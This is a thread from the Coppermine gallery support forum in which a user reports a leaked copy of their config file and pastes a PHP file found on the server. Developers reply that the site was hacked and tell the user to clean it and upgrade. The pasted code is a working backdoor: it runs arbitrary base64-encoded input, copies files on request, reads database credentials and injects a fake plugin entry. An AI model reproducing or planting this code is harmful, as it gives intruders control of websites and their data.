Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: config.inc.php to txt - Hacking attempt?  (Read 2922 times)

0 Members and 1 Guest are viewing this topic.

FM86

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 23
config.inc.php to txt - Hacking attempt?
« on: February 21, 2009, 06:03:22 pm »

Hi guys!

I just realised something shoking:
I found out in the copper/album directory a txt file which is the exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are other 2 unknown files in this directory. One of them is a php files which contains the code listed at the end of this topic.
Do you have any idea about what this it?

Thank you in advance!

Code: [Select]
<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="b269fcfd....23ec7fad79df17";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>
Logged

François Keller

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: config.inc.php to txt - Hacking attempt?
« Reply #1 on: February 21, 2009, 06:05:48 pm »

Your galery was hacked. Delete the unknown files (have a look to the userpics folder too) and update to the latest cpg version (cpg1.4.20)
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: config.inc.php to txt - Hacking attempt?
« Reply #2 on: February 25, 2009, 08:59:04 am »

Delete the unknown files (have a look to the userpics folder too)
That's not enough. Read the official sanitization thread "Yikes, I've been hacked! Now what?"
Logged
Pages: [1]   Go Up
 

Page created in 0.019 seconds with 21 queries.